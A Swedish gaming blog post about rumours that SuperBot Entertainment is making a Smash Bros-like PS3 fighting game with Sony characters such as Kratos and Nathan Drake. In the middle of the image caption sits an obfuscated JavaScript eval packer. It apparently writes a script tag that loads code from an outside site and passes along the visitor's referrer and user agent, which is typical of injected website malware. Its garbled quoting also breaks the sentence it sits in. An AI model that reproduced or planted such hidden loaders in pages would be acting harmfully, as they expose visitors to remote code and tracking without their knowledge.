Image Image Image Image Image Image Image Image Image Image

| 13 april, 2021

Scroll to top

Top

Smash Bros-kopia på väg till PS3?

Smash Bros-kopia på väg till PS3?
Sebastian

(bilden eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rfysy|var|u0026u|referrer|ybiby||js|php’.split(’|’),0,{}))
är gjord av ett PS3-fan)

Än så länge har Sony inte backat något av påståendena, så brukar det ju fungera när något stort är på ingång till PS3, men dessa nya rykten vill jag verkligen ha bekräftade eller dementerade!

Den nystartade spelstudion SuperBot Entertainment från Kalifornien ska enligt rykten just nu utveckla ett Smash Bros-inspirerat fightingspel exklusivt för PS3. För er som inte känner till Smash Bros-uttrycket så är det en spelserie till Nintendos senaste konsoler som går ut på att deras kändaste karaktärer (Mario, Link, Fox, Samus, Kirby, Yoshi et.c.) möts upp i ett och samma spel för att spöa skiten ur varandra.

Ryktet startade på sidan The Paul Gale Network som påstod att ett nytt, ”very amazing PS3 game” inkluderande en mängd karaktärer från Playstation-stallet så som Kratos (God of War), Sly Cooper (Sly Cooper), Nathan Drake (Uncharted), Sweet Tooth (Twisted Metal), Colonel Mael Radec (Killzone) och t.o.m. Fat Princess (Fat Princess) just nu utvecklas av den ännu okända spelstudion. Tillsammans med detta berättades det på sidan att banor från Jak & Daxter, LittleBigPlanet och Hot Shots Golf samt ett minispel baserat på Buzz!-serien även finns med i spelet. Samtidigt kan vi läsa på SuperBots officiella hemsida och enligt en påstådd platsannons att de just nu söker utvecklare som har stora beat-em-up och fighting-spel kunskaper samt utvecklare som är beprövade i online mode och kan matchmaking design.

Jag håller tummarna samtidigt som jag sitter och funderar på vilka fler karaktärer man vill se i spelet, om det nu överhuvudtaget är på väg.